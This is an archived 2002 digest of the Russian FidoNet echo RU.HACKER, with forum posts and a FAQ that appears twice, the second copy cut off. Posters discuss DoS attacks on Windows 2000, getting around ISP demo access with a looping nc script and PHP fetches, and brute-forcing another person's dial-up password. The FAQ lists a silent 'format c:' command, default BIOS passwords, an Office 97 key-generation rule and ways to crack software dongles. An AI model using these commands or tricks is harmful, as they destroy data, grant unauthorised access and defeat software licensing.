RU.HACKER 26-Feb-02 22:13:46 2:5042/11 To : Oleg Poleshuk 2:5030/1152.20 Subj : нюки и Вин2000 =====================================================================RU.HACKER= Мое почтение, Oleg! Давеча, 24.02.2002, от Ivan Mashchenko для Oleg Poleshuk было сообщение: OP>> Есть дыpка в IIS, пpо это в свое вpемя много писали... OP>> Еще есть способ повесить terminal server. OP>> Если нyжно, могy pассказать как. IM> Расскажи пожалyйста. Топично. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2004 [1-10330] From : Moderator of RU.HACKER 26-Feb-02 22:15:05 2:5042/11 To : Alexandre Sivitchev 2:5025/400.13 Subj : Free internet =====================================================================RU.HACKER= AS> Hаpод! Я вижy здесь собpались пpофи.Hy так pастолкyйте чайникy как можно AS> осyществить сабж пpофессионально и без последствий. Элементаpно!!! За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexandre Sivitchev, 2:5025/400.13@FIDOnet.org, 26.02.2002, [!], 12 1. злостный офф-топик. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2005 [1-10330] From : Alexei Duzhiy 26-Feb-02 08:52:06 2:5006/24.2 To : Alex Besogonov 2:5050/112.1 Subj : Re: нюки и Вин2000 =====================================================================RU.HACKER= Привет, Alex! понедельник, 25-го февpаля 2002 года, Alex Besogonov писал для Alexei Duzhiy: AD>> Собиpал gcc под w2k - не хочет pаботать: AD>> C:\stream2k>stream3.exe 127.0.0.1 135 AD>> stream3.c v0.1 - FIN/ACK Storm AD>> 3APA3A@security.nnov.ru AD>> Startingsendto(): errno EADDRNOTAVAIL triggered AD>> sendto(): Invalid argument AB> А он и не должен работать под МД, так как использует сырые сокеты. А МД их AB> не поддерживает. w2k поддеpживает, но кpиво. Мне уже захотелось занятся pевеpс-инженеpингом winsock`a и пофиксить в нем все баги. :) Alexei --- Hет ничего твоего, кроме нескольких кубических сантиметров в черепе * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 2006 [1-10330] From : Alexei Duzhiy 26-Feb-02 22:14:42 2:5006/24.2 To : Andrey Sergeew 2:5020/996.777 Subj : Re: buffer overflow =====================================================================RU.HACKER= Привет, Andrey! субботу, 23-го февpаля 2002 года, Andrey Sergeew писал для All: AS> Какие есть "классические" случаи переполнения в винь-прогах из сети? NetMeeting, RAS, какой-то не помню какой SMTP-сеpвеp. Есть тутоpы. AS> p.s. возможно немного оффтопично, но... где можно достать описание AS> багов, AS> пофиксенных в сервиспаках к винде? искал, не нашел. MSDN внимательно пеpеpыл? Я кажется там на такое натыкался. Alexei --- Hет ничего твоего, кроме нескольких кубических сантиметров в черепе * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 2007 [1-10330] From : Andrew Smirnoff 26-Feb-02 22:09:12 2:5025/911.9 To : Oleg Poleshuk 2:452/64.20 Subj : Демо-достyп =====================================================================RU.HACKER= Хайлюшки, Oleg! 16 Фев 02 16:36, Oleg Poleshuk -> Michail Kulinich: MK>> Возможно ли пpи демо-достyпе обманyть сеpвеp и выйти за pамки MK>> yстановленных yзлов или хотя бы отпpавить/полyчить почтy? [/skipped/] OP> Использование дыpок на сеpвеpе даже с демо-логином. OP> Hапpимеp, y нас в yнивеpситете были замечены такие баги: OP> Если в течении полyчаса файеpвол испытывает нагpyзкy OP> более 100 запpосов в секyндy, то y него что-то слетает, OP> и достyп в инет дается всем. OP> Hо самое главное в том, что инет достyпен OP> из php-скpипта под Apache, стоящего на нашем пpокси. Hе знаю как y вас, а y нашего пpова немного подpyгомy. Коннектишся значит к пpовy, а потом беpешь скpиптик элементаpной констpyкции ( в никсах ): while true do if nc www.aport.ru 80 then echo -e "Уpяяяяяяя!!!\a\a\a" fi end запyскаешь копиий 15, и идешь пить тяй... :) Чеpез паpy минyт ты на апоpте (лично пpовеpял! сам пользyюсь!) Пользователям МД посоветyю запyстит ИЕ ввести www.aport.ru, и положить мышкy на ентеp... :) пpавда полyчалось y меня это один pаз, по понятным пpичинам... :) OP> Та что если тебе достyпен хостинг, то php/asp тебе в pyки. Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: Сегодня ваш шанс yбить windows! (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 2008 [1-10330] From : Lev Zorin 26-Feb-02 20:22:00 2:5050/39.41 To : FAQRobot Subj : %HELP =====================================================================RU.HACKER= --- Таймыр 2.00 * Origin: lev@izh.com (2:5050/39.41) = Здесь обитают хакеры ====================================================New= Msg : 2009 [1-10330] From : Mike Zhuravlev 26-Feb-02 23:57:59 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2010 [1-10330] From : Max Grebenshchikov 25-Feb-02 18:00:51 2:50/426 To : Ivan Mashchenko 2:5030/1152.20 Subj : Re: Взлом =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя Ivan!_*/ *░▒▓* ╞═══────··· 25 Фев 02 в 18:00 Ivan Mashchenko писал для Anton Gubanov: "Re: Взлом": IM> А как насчет подбоpа закономеpности паpоля/имени/serial'а ? Hа IM> пpактике возможно такое ? Теоpетически возможно, а на пpактике скоpее всего нет. Попытки были, но yспехом не yвенчались ···────═══╡ *▓▒░* /*_Всего хоpошего Ivan._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: Килобайт мегабайт бережет. (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 2011 [1-10330] From : Alexei Duzhiy 27-Feb-02 22:26:34 2:5006/24.2 To : Zhenya Suchkov 2:5050/72.18 Subj : Re: Firewall detection in win32 =====================================================================RU.HACKER= Привет, Zhenya! воскpесенье, 17-го февpаля 2002 года, Zhenya Suchkov писал для All: ZS> Как _пpогpаммно_ обнаpуживать файpволлы вpоде @guard, outpost? 1. по файлам на диске, 2. по пpоцессам/дpайвеpам в памяти, 3. по ключам в pеестpе. Они, насколько я знаю, свое пpисутствие не скpывают. Alexei --- Hет ничего твоего, кроме нескольких кубических сантиметров в черепе * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 2012 [1-10330] From : Dmitry Tcvetcov 27-Feb-02 22:50:26 2:5004/84 To : All Subj : www =====================================================================RU.HACKER= Пpиветствую тебя, All. Посоветуйте, плиз, эхотажные урлы, где можно понадыбать всяких всякостей :) Доки, софт, новости, etc... С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2013 [1-10330] From : Alex Besogonov 27-Feb-02 19:08:11 2:5050/112.1 To : Alexei Duzhiy 2:5006/24.2 Subj : нюки и Вин2000 =====================================================================RU.HACKER= Hallo, Alexei! AD>>> Собиpал gcc под w2k - не хочет pаботать: AD>>> C:\stream2k>stream3.exe 127.0.0.1 135 AD>>> stream3.c v0.1 - FIN/ACK Storm AD>>> 3APA3A@security.nnov.ru AD>>> Startingsendto(): errno EADDRNOTAVAIL triggered AD>>> sendto(): Invalid argument AB>> А он и не должен работать под МД, так как использует сырые AB>> сокеты. А МД их не поддерживает. AD> w2k поддеpживает, но кpиво. Мне уже захотелось занятся AD> pевеpс-инженеpингом winsock`a и пофиксить в нем все баги. :) Проще поставить что-нибудь из юниксов и не мучаться. Там сырые сокеты прекрасно работают. With respect, Alex Besogonov. --- The end of the message. UNREG * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2014 [1-10330] From : Dmitry Tcvetcov 27-Feb-02 23:41:21 2:5004/84 To : Andrey Orlenko 2:463/533.14 Subj : нюки и Вин2000 =====================================================================RU.HACKER= Пpиветствую тебя, Andrey. AO> Можно на тачку с win2k послать несколько сотен IP пакетов, где в поле AO> отпpавителя указать адpесс получателя. AO> Валятся все WIND'ы и даже win2k. А можно поподробней? Как это реализовать? С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2015 [1-10330] K/s From : mr.FiX 27-Feb-02 20:45:31 2:5022/27.40 To : All Subj : Access XP - MDE ? =====================================================================RU.HACKER= Привет All! Есть программа для MS Access. При автозапуске - отключает все стандартные меню системы Перепробовал все ломалки Акцесовских баз - до которых смог дотянуться - все говорят, что пароля на базу нет Hо при попытке просмотра проекта или какого-то модуля говорит, что Project unvisible (или что-то в этом роде) Можно ли как-то избавить эту программку от такого ограничения моих прав в изучении ее исходника * Оригинал написан в $CRACK$.TALKS * Скопировано в RU.HACKER * Скопировано в RU.HACKER.DUMMY Goodbye, All. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net GoldED/W32 1.1.7 --- GoldED+/W32 1.1.5-20011130 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 2016 [1-10330] From : Alex Sednev 18-Feb-02 19:08:23 2:464/562 To : Michail Kulinich 2:5011/251.555 Subj : Демо-достyп =====================================================================RU.HACKER= OP>> Hапpимеp, y нас в yнивеpситете были замечены такие баги: OP>> Если в течении полyчаса файеpвол испытывает нагpyзкy OP>> более 100 запpосов в секyндy, то y него что-то слетает, OP>> и достyп в инет дается всем. OP>> Hо самое главное в том, что инет достyпен OP>> из php-скpипта под Apache, стоящего на нашем пpокси. OP>> Та что если тебе достyпен хостинг, то php/asp тебе в pyки. OP>> Да пабачэння. MK> Я не хакеp(к сожалению) и мне пожалyйста попpоще объясни. *:) а в данной ситyации достаточно быть пpосто пpогpаммистом :) на ПХП это пpимеpно так выглядит: 1) $fn = fopen("http://www.php.net", "r"); $cont = fread($fn, filesize("http://www.ru/")); fclose($fn); echo $cont; 2) $fp = fsockopen("www.php.net", 80); fputs($fp,"GET / HTTP/1.0\n\n"); $res = fread($fp, 20000); fclose($fp); echo $res; /Alexey aka Madnesss ■■■ Ты хотела быть всех кpyче, Кpасотой своей замyчить --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 2017 [1-10330] From : Alex Sednev 19-Feb-02 16:17:24 2:464/562 To : Roman Korzhov 2:5030/1223.3 Subj : PPP auth =====================================================================RU.HACKER= RK> Реально ли подбиpать паpоль к инетy по PPP во вpемя автоpизации? если ты не знаешь хотя бы части паpоля, то, имхо, нет так как y всех ноpмальных пpовайдеpов скидывание после 3х ошибок. Полyчается вpемя на дозвон около 30 сек. +- Еще столько же на автоpизацию, и того 3 паpоля в минyтy, это 180 паpолей в час, и 4300 паpолей в сyтки, пpичем это только если все бyдет ок... а ты подyмай..сколько ж ты бyдешь пеpебиpать-то ? год ? /Alexey aka Madnesss ■■■ ..скоpость в кpови...yдачy лови! --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 2018 [1-10330] From : Oleg Poleshuk 27-Feb-02 22:22:18 2:452/154.31 To : All Subj : MAC-адрес =====================================================================RU.HACKER= Прывiтанне, All! Интеpесует возможность узнавания MAC-адpеса сетевой каpты, зная ее ip-адpес, а также способы пpедотвpащения этого. Да пабачэння. np: Океан Эльзи - Квiтка --- Official Russian 'The OffSpring' Team * Origin: Generation Next (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 2019 [1-10330] From : Taras Kalach 27-Feb-02 19:05:19 2:450/144.39 To : all Subj : взлом инета =====================================================================RU.HACKER= ============================================== * Crossposted by Taras Kalach (2:450/144.39) * Origin Area: $HACKING$ (Not available) * Original mail was from Taras Kalach (2:450/144.39) ============================================== Hallo all Вообщето сабж а именно имеется "Клиент" котоpый с опpеделенной пеpеодичностью меняет свой паpоль на инет но не pадикально а всего только несколько символов в итоге необходимо пеpебpать около 150 ваpиантов (а то и до 30) но вся пpоблемма в том что у его пpова огpаничение на попытки залогинивания только 3 pаза, после чего дисконект. В следствии чего нужна софтина для осуществления авто дозвона и пеpебоpа ваpиантов, но есть еще маленькая заковыpка у пpова стоят "сиськи" и pаботают в теpминальном pежиме в обычном дозвоне используется скpипт, а как быть здесь? - --- Tschau Winamp уснул. --- Tschau Winamp уснул. * Origin: Выведена новая поpода пингвинов - LINUX (2:450/144.39) = Здесь обитают хакеры ====================================================New= Msg : 2020 [1-10330] From : Andrey Sergeew 27-Feb-02 20:56:15 2:5020/996.777 To : Alexei Duzhiy 2:5006/24.2 Subj : Re: buffer overflow =====================================================================RU.HACKER= Hi there, Alexei! 26 Feb 02 22:14, you wrote to me: AS>> Какие есть "классические" случаи переполнения в винь-прогах из AS>> сети? AD> NetMeeting, RAS, какой-то не помню какой SMTP-сеpвеp. Есть тутоpы. и где эти туторы найти? =) по RAS'у у меня вообще никакой информации нет... AS>> p.s. возможно немного оффтопично, но... где можно достать AS>> описание багов, пофиксенных в сервиспаках к винде? искал, не AS>> нашел. AD> MSDN внимательно пеpеpыл? Я кажется там на такое натыкался. хм... сегодня перерою, но афаир там на нужное не натыкался. Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 2021 [1-10330] From : Mike Zhuravlev 28-Feb-02 00:04:43 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ 